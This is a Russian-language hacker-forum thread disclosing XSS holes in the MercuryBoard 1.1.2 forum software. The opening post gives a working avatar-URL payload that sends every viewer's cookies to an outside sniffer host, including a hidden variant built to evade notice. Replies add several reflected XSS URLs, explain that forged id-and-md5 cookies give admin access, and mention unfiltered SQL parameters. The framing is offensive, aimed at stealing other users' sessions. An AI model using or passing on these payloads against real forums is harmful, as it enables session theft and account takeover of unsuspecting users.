Несколько уязвимостей xss в форуме MercuryBoard
(2 ПРИМИТИВНЕЙШИХ в bb тегах и 1 в аватарке)

1 из них заключается в плохой защищенности bb тега color, что дает нам право внедрить в него xss иньекцию.
Итак, вот сплойт:
Для алерта: 123
И для сниффа: 123
2 уязвимость заключается в плохой защищенности bb тега font, что также дает возможность внедрить в его тело вредоносный код.
Для алерта: 123
И для сниффа: 123
3 дыра самая интересная и самая матерая, это уязвимость в аватарке. Мы можем внедрить в адресс аватара свой сплойт, при этом со стороны это не будет никак выкупатся=), а сплойт тем временем будет собирать кукисы всех, кто будет читать ваши посты, или кто заглянет к вам в личный кабинет. При этом, при просмотре свойств аватара, пользователь не увидит ничего подозрительного, так как, в адресе будет указано http://smailiki.ru/smile/1.gif/ . Как видим, слеш в конце нам все поганит, это проявляется из-за экранирования знака (') ,бек слешем. Но с этим ничего не поделаешь, и хоть аватарка отображатся не будет, у обычных пользователей, да даже у админов, имхо это вызовет мало подозрений. Пускай думают что глюки.=)
Чуть не забыл, вот и сплойт: http://smailiki.ru/smile/1.gif'style=background:url(javascript:img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;);1.gif
ну и как уже стало традицией, алерт: http://smailiki.ru/smile/1.gif'style=background:url(javascript:alert(docume nt.cookie));1.gif

Уже когда все набрал, подумал, а зачем аватврка нам вообще нужна, сделаем её невидимой, как будто бы её вообще нету. И ход этот правильный, так как палива в данной ситуации ноль. Итак, вот сплойт:
'style=background:url(javascript:img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);display:none;1.gif

Укажи плиз версию MercuryBoard...
И кроме того, если публикуете такие баги, то не мешало бы описать систему защиты форума в целом. Хранится ли пасс в куках, не используется ли двойное хеширование и т.п. Потому как эти XSS могут ничего и не давать.

Укажи плиз версию MercuryBoard...
И кроме того, если публикуете такие баги, то не мешало бы описать систему защиты форума в целом. Хранится ли пасс в куках, не используется ли двойное хеширование и т.п. Потому как эти XSS могут ничего и не давать.
Я проганял это всё на форуме версии 1.1.2
В куках хранятся только id пользователя и его md5 хеш, следует на сниффер мы получаем эти данные. Вот алерт как пример:

http://oldhz.h14.ru/mer.png

пробовал ли на других форумах?

Помоему там все было найдено... Или я ошибаюсь

пробовал ли на других форумах?Ну вот скрин к примеру: http://rts.h15.ru/mer1.png и http://rts.h15.ru/mer2.png
Помоему там все было найдено... Или я ошибаюсьХЗ, когда нашел прежде всего проверил на секлабе, таких нет, а были бы найдены, полюбому были бы там, имхо.

Помоему там все было найдено... Или я ошибаюсьЕсли не ошибаешься подскажи тогда для vBullentin'a и phpBB , вроде где-то читал что малую фильтрацию проходят и что можно "захватить"
cp юзверя в phpbb или я уже запамятовал...

Вот ещё одна xss`ска(в профиле): http://www.site.ru/mercutyboard/index.php?a=profile&w=<script>alert(document.cookie)</script> (http://www.site.ru/mercutyboard/index.php?a=profile&w=<script>alert(document.cookie)</script>)

Интуиция подсказывает что это ещё не всё....

Да там ещё КСТАТИ почти ни один параметр не проверяется перед mysql_query

Нет, никакого двойного хеш. не используется.
Все очень просто... md5 хеш и номер юзера в таблице
Можно подделать куки и зайти в админку

2 Pink-Panther и KEZ,

А вам IPB не интересно взламывать?

А там уже все взломано (в плане Xss)

А те баги которые Я нашол вы не смотрели?

Вот ещё парочка:http://site/mercuryboard/index.php?a=topic&t="><script>alert(document.cookie)</script> http://site/mercuryboard/index.php?a=cp&s=addsub&type="><script>alert(document.cookie)</script>topic&item=3
Оставляю только те, которых нет на секлабе.

Если честно, то просто позорно в таких форумах находить баги. Равно сильно у ребёнка отнять конфетку. :rolleyes: